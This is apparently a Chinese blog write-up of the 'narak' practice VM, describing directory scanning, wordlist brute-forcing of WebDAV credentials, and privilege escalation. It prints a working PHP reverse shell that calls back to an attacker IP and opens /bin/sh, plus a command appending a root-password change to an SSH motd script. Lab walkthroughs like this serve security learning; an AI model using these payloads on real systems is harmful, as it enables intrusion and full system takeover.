当前位置: 首页 > news >正文

全球网站建设服务商/软文写作经验

全球网站建设服务商,软文写作经验,电子产品网站设计,网站建设公司中企动力推荐narak靶机复盘 首先对靶机进行扫描,找到靶机的真实ip地址。 然后dirb进行目录扫描,扫描到一个目录,我们打开发现是一个登陆界面。 并没有用户名和密码,我们就用cewl扫描这个网站,扫出一个字典,用来暴力破…

narak靶机复盘

首先对靶机进行扫描,找到靶机的真实ip地址。

然后dirb进行目录扫描,扫描到一个目录,我们打开发现是一个登陆界面。

image-20230628213107521

image-20230628213148152

并没有用户名和密码,我们就用cewl扫描这个网站,扫出一个字典,用来暴力破解。

cewl http://192.168.197.170 -w passwd1.txt

image-20230628202905535

经过暴力破解发现了一个用户名和密码

login: yamdoot password: Swarg

成功登陆webdav这个页面,在网上搜索了一下webdav,发现是一个客户端,发现有专门针对这个客户端上传文件的工具,所以我们就利用cadaver上传一个php木马文件。

Cadaver 是一个命令行 WebDAV 客户端工具,可以用来管理 WebDAV 服务器上的文件和目录。

创建一个shell.php在当前目录下,然后使用cadaver登陆webdav,使用put shell.php命令就能把我们的木马上传。

<?php
$ip='192.168.197.160';
$port='8888';
$sock = fsockopen($ip,$port);
$descriptorspec = array(0 => $sock, 1 => $sock, 2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>

image-20230628204733683

原本登陆后是没有shell.php,现在我们上传后执行一个反弹shell,用kali来监听就可以返回一个命令行。

image-20230628205022968

image-20230628205008779

用python3美化一下命令行。

image-20230628205129325

经过寻找发现在/mnt目录下有一个hell.sh文件,打开后发现有一串brainfuck加密文本,经过解密发现明文是chitragupt

image-20230628205238020

image-20230628205427597

发现home下面有三个用户,就尝试用这个密码来登陆一下,发现刚好是inferno用户的密码,因为原本是web shell权限很低,现在拿到了真正的shell。

image-20230628205605050

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null#命令解释:
从根目录下开始查找 文件类型 属主是root 普通用户或组可执行 其他用户可写  如果发现了符合条件的用 ls -l命令显示  错误信息从定向到null

image-20230628214755879

motd是负责ssh登录后,页面欢迎语 提示语的,用户可以通过配置文件自定义欢迎提示信息。具体配置文件理论上这个目录下的任意文件都可以。通常修改00-header文件即可。

/etc/update-motd.d/00-header

echo “echo ‘root:admin’|sudo chpasswd”>>/etc/update-motd.d/00-header

image-20230628210109761

image-20230628212205368

虽说理论上修改这个文件夹的所有文件都可以,但是经过尝试了一个别的文件,并不能成功修改root密码,只有00-header在ssh连接时候会执行成功。

image-20230628212601630

http://www.jmfq.cn/news/5301487.html

相关文章:

  • 哈尔滨在线制作网站/seo运营
  • 大石桥网站建设/网站优化平台
  • 做高级电工题的网站/外链seo推广
  • 哪个网站做ppt赚钱/怎样在百度上做广告推广
  • 企业网站建设目的选择题/深圳网络推广大师
  • 强化 门户网站建设/市场监督管理局官网入口
  • 网站怎样做的高大上/今日重大新闻头条
  • wordpress类似的前端/seo手机搜索快速排名
  • wwe中文官网站/武汉百度推广多少钱
  • 做暖暖小视频老司机网站/网站推广方式组合
  • 可以看男男做的视频网站/大数据营销成功案例
  • 怎么直接做免费网站/企业营销策划包括哪些内容
  • 新乡移动网站建设/自己有网站怎么推广
  • 无锡大型互联网公司/seo关键词优化外包
  • 苏州网站建设哪家公司好/上海关键词优化报价
  • 国内室内设计网站大全/免费广告网
  • 用织梦做的网站好还是cms/简述获得友情链接的途径
  • swf做网站头/网络营销软件大全
  • 汕头专业网站制作公司/百度新闻官网首页
  • 公司网站的设计风格大多是/seo搜索铺文章
  • 网站构架图怎么做/重庆seo教程博客
  • 类似设计师联盟的网站/百度seo教程网
  • 使用的是什么网站模板/代写文章的平台有哪些
  • 国外专名做路演的网站/免费进入b站2022年更新
  • 用ip访问没有备案的网站/浙江seo公司
  • 武汉网站建设whjzyh/如何进行app推广
  • wordpress add_action 是什么意思/广告优化师前景怎样
  • wordpress个人中心没有反应/广东网站优化公司
  • 福清建设银行网站/站长工具是干嘛的
  • 景德镇网站建设公司/重庆网页搜索排名提升